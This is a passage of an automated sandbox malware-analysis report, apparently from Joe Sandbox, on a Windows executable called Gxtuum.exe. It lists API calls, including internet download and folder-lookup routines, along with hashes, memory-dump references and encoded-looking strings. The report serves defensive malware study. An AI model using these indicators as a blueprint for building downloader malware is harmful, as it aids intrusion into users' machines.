                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: bdec59f59a08f04f732bcf6251f79bf9c09292db50031cc814f583b315c4deb3
                                                                • Instruction ID: 55d3c87de21f2f8ea26c17e8f8e431f15491539c8e4512faa531a8b4f69fdf75
                                                                • Opcode Fuzzy Hash: bdec59f59a08f04f732bcf6251f79bf9c09292db50031cc814f583b315c4deb3
                                                                • Instruction Fuzzy Hash: ADC18772E40214BFDB64DBA8CC82FEE77F99B19710F544065FA04FB282D770A98097A4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3907804496
                                                                • Opcode ID: 8372ea036297aac7f3bae68546b8f9b3b7741f48f3653e7f892e930478aaac5b
                                                                • Instruction ID: 0b8ae7d2805acd4d8c5e7f9c80e5f8f35df12507d3c9a783d4a4edb020361d86
                                                                • Opcode Fuzzy Hash: 8372ea036297aac7f3bae68546b8f9b3b7741f48f3653e7f892e930478aaac5b
                                                                • Instruction Fuzzy Hash: 02C1D170A0C245AFDB19DFA8C8C1BEEBBB0BF59310F144069F5459B2A2CB7199C1CB61
                                                                APIs
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0010D20F
                                                                • type_info::operator==.LIBVCRUNTIME ref: 0010D231
                                                                • ___TypeMatch.LIBVCRUNTIME ref: 0010D340
                                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0010D412
                                                                • _UnwindNestedFrames.LIBCMT ref: 0010D496
                                                                • CallUnexpected.LIBVCRUNTIME ref: 0010D4B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                • String ID: csm$csm$csm
                                                                • API String ID: 2123188842-393685449
                                                                • Opcode ID: 8ef6bc6a15d097799f024e362630a78ed53ac625baf4c016e333d8be8ab53459
                                                                • Instruction ID: 58cc018d26f082863fe0b905d2c9232b69031924c6fe9a4b4604562c711a6c4b
                                                                • Opcode Fuzzy Hash: 8ef6bc6a15d097799f024e362630a78ed53ac625baf4c016e333d8be8ab53459
                                                                • Instruction Fuzzy Hash: 9EB19D71800209EFCF18DFE4E8819AEBBB5FF14310B144169F895AB696D7B0EA51CF91
                                                                APIs
                                                                • InternetOpenA.WININET(0013CE7B,00000000,00000000,00000000,00000000), ref: 000FCD5F
                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000FCD7C
                                                                • InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 000FCD90
                                                                • InternetCloseHandle.WININET(00000000), ref: 000FCD9B
                                                                • InternetCloseHandle.WININET(?), ref: 000FCDA0
                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 000FCDF9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileReadSleep
                                                                • String ID: 246122658369$2LE=$Ph
                                                                • API String ID: 2890883735-3814100221
                                                                • Opcode ID: 31525ed873d4b89be7504bc568c79be57931d2c5074bd2487037cd37459f8cb1
                                                                • Instruction ID: d087af6c3b1e4f7ca8bd51ffb3e60cab13f8f3fa7ee6e20e806dcd9a1b74a3f9
                                                                • Opcode Fuzzy Hash: 31525ed873d4b89be7504bc568c79be57931d2c5074bd2487037cd37459f8cb1
                                                                • Instruction Fuzzy Hash: B1813971A0024CABEF18DF78CD4ABBD7F76AF85300F648118F545A76C2CBB58A849791
                                                                APIs
                                                                • _free.LIBCMT ref: 001170BE
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 001170CA
                                                                • _free.LIBCMT ref: 001170D5
                                                                • _free.LIBCMT ref: 001170E0
                                                                • _free.LIBCMT ref: 001170EB
                                                                • _free.LIBCMT ref: 001170F6
                                                                • _free.LIBCMT ref: 00117101
                                                                • _free.LIBCMT ref: 0011710C
                                                                • _free.LIBCMT ref: 00117117
                                                                • _free.LIBCMT ref: 00117125
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: a6628158ddeb24f4a34ba61f7e9cedf93a88564bc8ffd72b5d8fefbc041f917a
                                                                • Instruction ID: 7becc53ad281a994ba193c646e54b98d8ff7a8689fce5e7bef6e9aeeb4a69bb4
                                                                • Opcode Fuzzy Hash: a6628158ddeb24f4a34ba61f7e9cedf93a88564bc8ffd72b5d8fefbc041f917a
                                                                • Instruction Fuzzy Hash: DC219A76910208AFCB45EF94CD81DDEBBB9FF98340F0181A5F515AB121EB31EA84CB90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 246122658369$2vE=$dzRUatfzLr==
                                                                • API String ID: 0-3489045377
                                                                • Opcode ID: 8939edf6dd60a26f585e9aea47c8e5a989bc527283d78af199b007588af479db
                                                                • Instruction ID: 955f24687400d454f4d7e6abec221d409847655b2dc6a26bb76e1a8d4690036e
                                                                • Opcode Fuzzy Hash: 8939edf6dd60a26f585e9aea47c8e5a989bc527283d78af199b007588af479db
                                                                • Instruction Fuzzy Hash: 16B1C170A0024CEFEF14DFA8C94ABEEBBB5EF45304F508158E941676C2D7B59A44CB92
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free
                                                                • String ID:
                                                                • API String ID: 269201875-0
                                                                • Opcode ID: 07b444fd61bf491979a4aaa03f82aa1b5f3caff0183169dd4cffee8fc72fc8d5
                                                                • Instruction ID: 2571bb16390ccdc858a6142a25f53e43171d3637e9f892ffdb9a42ae2a3235f1
                                                                • Opcode Fuzzy Hash: 07b444fd61bf491979a4aaa03f82aa1b5f3caff0183169dd4cffee8fc72fc8d5
                                                                • Instruction Fuzzy Hash: DE610671900355BFDB24EF64D841FAAB7F9FF65720F104529E849EB281EB70AD808B50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                • String ID:
                                                                • API String ID: 3943753294-0
                                                                • Opcode ID: 897eb11877fd43a912f490587694e36c4f9e490a2598b8a09484984ad79e4b6c
                                                                • Instruction ID: 92da8a4f611b4c4ecaa8525b3e54c566a885e3823ee3bd729b81c90f3326f945
                                                                • Opcode Fuzzy Hash: 897eb11877fd43a912f490587694e36c4f9e490a2598b8a09484984ad79e4b6c
                                                                • Instruction Fuzzy Hash: C3517C75A00206EFCF10DF64C9A55A9B7F4FF09320B25855AE886AB6D6C7B0ED80CB50
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                                • String ID:
                                                                • API String ID: 3990724213-0
                                                                • Opcode ID: f600073e60740b4d502991d4210bea5760dc5a104c0255e52aa7324968d4d27c
                                                                • Instruction ID: 15195f0fa839e57e282ec7001ead58c21d86a89d1d07c54088959a2f769d770c
                                                                • Opcode Fuzzy Hash: f600073e60740b4d502991d4210bea5760dc5a104c0255e52aa7324968d4d27c
                                                                • Instruction Fuzzy Hash: 50B102B1D006099FDB24DF74C949BAEBBB4FF15300F00452EE896A76D2DBB1A944CB91
                                                                APIs
                                                                  • Part of subcall function 000EA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,455139FB,00000000,?), ref: 000EA4BA
                                                                • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00147494,0000000E,455139FB,?,00000000), ref: 000FAD5D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: AttributesFileFolderPath
                                                                • String ID: .$0s==$246122658369$2LE=$2Phf
                                                                • API String ID: 1512852658-2364514272
                                                                • Opcode ID: f6766b12a34ea0c04cd4ec7c2446624bc1d9c337a9ee4703b19854d998dd8170
                                                                • Instruction ID: 97526534340c8170a07bd0f87ca8b52e0286204c59b9eee55ae11da2d374b855
                                                                • Opcode Fuzzy Hash: f6766b12a34ea0c04cd4ec7c2446624bc1d9c337a9ee4703b19854d998dd8170
                                                                • Instruction Fuzzy Hash: 11E1907090428CDFEF14DBA8C9497DDBFB6AF51304F548188D4452B6C2C7B55A88DF92
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: list too long
                                                                • API String ID: 0-1124181908
                                                                • Opcode ID: c37170b868e2b02cf78c913bf54173dbafbe20f7e2554713133cf2c00377a751
                                                                • Instruction ID: 62348883b0880ef16c30ee82e33ed9b416931b5443cfcccb52564900bb9cfeb2
                                                                • Opcode Fuzzy Hash: c37170b868e2b02cf78c913bf54173dbafbe20f7e2554713133cf2c00377a751
                                                                • Instruction Fuzzy Hash: 1151B1B4D047189BDB10DF64DD85B9AF7F4FF14310F0042A9E948AB691DB70AA81CF51
                                                                APIs
                                                                • _ValidateLocalCookies.LIBCMT ref: 0010CC17
                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0010CC1F
                                                                • _ValidateLocalCookies.LIBCMT ref: 0010CCA8
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0010CCD3
                                                                • _ValidateLocalCookies.LIBCMT ref: 0010CD28
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                • String ID: csm
                                                                • API String ID: 1170836740-1018135373
                                                                • Opcode ID: fbc72e3a9ea89df8155d7299e7c7390450a901404e02e8b22e9f5ec3c57bdfda
                                                                • Instruction ID: b8730794b83aed571cc29ed6be402cfceb68a295a8ed8995bef0c73447758634
                                                                • Opcode Fuzzy Hash: fbc72e3a9ea89df8155d7299e7c7390450a901404e02e8b22e9f5ec3c57bdfda
                                                                • Instruction Fuzzy Hash: 7941E434A002199BCF00EFA8C881A9EBBB5FF45324F148255E859AB3D2D7B1DA05CFD1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: api-ms-$ext-ms-
                                                                • API String ID: 0-537541572
                                                                • Opcode ID: 9db6299b8b20cf52443d471fd211fa46cf76ad2ed775ba2337e3202ac3291e25
                                                                • Instruction ID: a82b5adcd954ad7f0e3dcdc57576528fec47ee88254e5a4d3444e57df6cc0b8c
                                                                • Opcode Fuzzy Hash: 9db6299b8b20cf52443d471fd211fa46cf76ad2ed775ba2337e3202ac3291e25
                                                                • Instruction Fuzzy Hash: F021E7B1A09211ABDB298B34AC85A9F37699F05760F254131FC16A72D1DF30EC80C6E4
                                                                APIs
                                                                  • Part of subcall function 00121522: _free.LIBCMT ref: 00121547
                                                                • _free.LIBCMT ref: 00121824
                                                                  • Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
                                                                  • Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,8B18EC83,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE
                                                                • _free.LIBCMT ref: 0012182F
                                                                • _free.LIBCMT ref: 0012183A
                                                                • _free.LIBCMT ref: 0012188E
                                                                • _free.LIBCMT ref: 00121899
                                                                • _free.LIBCMT ref: 001218A4
                                                                • _free.LIBCMT ref: 001218AF
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                • Instruction ID: af356fa42009798e60cc4f6803258244cbb6eabeeb505adb44c4226e39960f38
                                                                • Opcode Fuzzy Hash: 8e077332dbe01b7341d50a84b951b88c6f42d95a84fc469bf2f7f0e4c6a3109e
                                                                • Instruction Fuzzy Hash: 79117F32941B14BAD530FBB0DC47FCBB7DDAFA5700F804C24B29BA6052DB24F6554650
                                                                APIs
                                                                • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 00117BA7
                                                                • __fassign.LIBCMT ref: 00117D8C
                                                                • __fassign.LIBCMT ref: 00117DA9
                                                                • WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00117DF1
                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00117E31
                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00117ED9
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                • String ID:
                                                                • API String ID: 1735259414-0
                                                                • Opcode ID: 9b390f039bdd075c69a70d7fbe8e738d705fbe0eed1c349908aeedff937d54ac
                                                                • Instruction ID: f325c1b52732f2ade0ea2b56702e023a8ef2b94442e3b24a2b3cfda6e691a660
                                                                • Opcode Fuzzy Hash: 9b390f039bdd075c69a70d7fbe8e738d705fbe0eed1c349908aeedff937d54ac
                                                                • Instruction Fuzzy Hash: A6C18D75D092589FCB18CFE8D8809EDBBF5AF59304F2841AAE855B7381D7319D82CB60
                                                                APIs
                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00109C0F
                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00109C7A
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00109C97
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00109CD6
                                                                • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00109D35
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00109D58
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiStringWide
                                                                • String ID:
                                                                • API String ID: 2829165498-0
                                                                • Opcode ID: 2d19d76c1e96b5343425ab2a197b7956ba44a7d40a10f8c95576c64f1c195c2c
                                                                • Instruction ID: 670b2ea869d78fd9cae5cfe459dcde6eeaf1aaccf7e4917ae34e69433a2570eb
                                                                • Opcode Fuzzy Hash: 2d19d76c1e96b5343425ab2a197b7956ba44a7d40a10f8c95576c64f1c195c2c
                                                                • Instruction Fuzzy Hash: 3751AC7294020ABBEF208FA1DC55FAF7BA9EF44750F254129F951D61A2E7B1CD10CBA0
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00104BA5
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00104BC7
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00104BE7
                                                                • __Getctype.LIBCPMT ref: 00104C7D
                                                                • std::_Facet_Register.LIBCPMT ref: 00104C9C
                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00104CB4
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                • String ID:
                                                                • API String ID: 1102183713-0
                                                                • Opcode ID: 31821e202b6d1a0574d60d39e559f950d68dff67b9094869e1bc6f02221b472d
                                                                • Instruction ID: 6396b66ffb2b629aea17262d6c08dbbcf950cd70c82143d6483110cea3279714
                                                                • Opcode Fuzzy Hash: 31821e202b6d1a0574d60d39e559f950d68dff67b9094869e1bc6f02221b472d
                                                                • Instruction Fuzzy Hash: A141EFB0D052148FDB25DF54C980AAEB7F0EF65710F14816DE885AB291DBB0AE41CB80
                                                                APIs
                                                                • GetLastError.KERNEL32(?,0012C21D,0010CD9B,0010B434,00108149,455139FB,?,?,?,00000000,0012CE07,000000FF,?,000E2576,?,?), ref: 0010CDB2
                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0010CDC0
                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0010CDD9
                                                                • SetLastError.KERNEL32(00000000,?,00000000,0012CE07,000000FF,?,000E2576,?,?,0000000F,000E3BA5,00000000,0000000F,00000000,0012C7A0,000000FF), ref: 0010CE2B
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923990602.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_e0000_Gxtuum.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastValue___vcrt_
                                                                • String ID:
                                                                • API String ID: 3852720340-0
                                                                • Opcode ID: 8bfc0ca93005bcc8b60cb990ef357cbed6c3832a0fc007eb86e3b9cca1f3a09c
                                                                • Instruction ID: 62df7a1b25fd168e0736f5d8d9736ccd105d227204d4c8ae8e0343f5049f3dd0
                                                                • Opcode Fuzzy Hash: 8bfc0ca93005bcc8b60cb990ef357cbed6c3832a0fc007eb86e3b9cca1f3a09c
                                                                • Instruction Fuzzy Hash: 1C01F73A20C3226EE62827F4BC865572F44EB53B7A330033AF555854F2EFD14C82AAC1
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, xrefs: 0011FA3C
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.2923825960.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true
                                                                • Associated: 00000001.00000002.2923774824.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923899696.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000001.00000002.2923951244.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
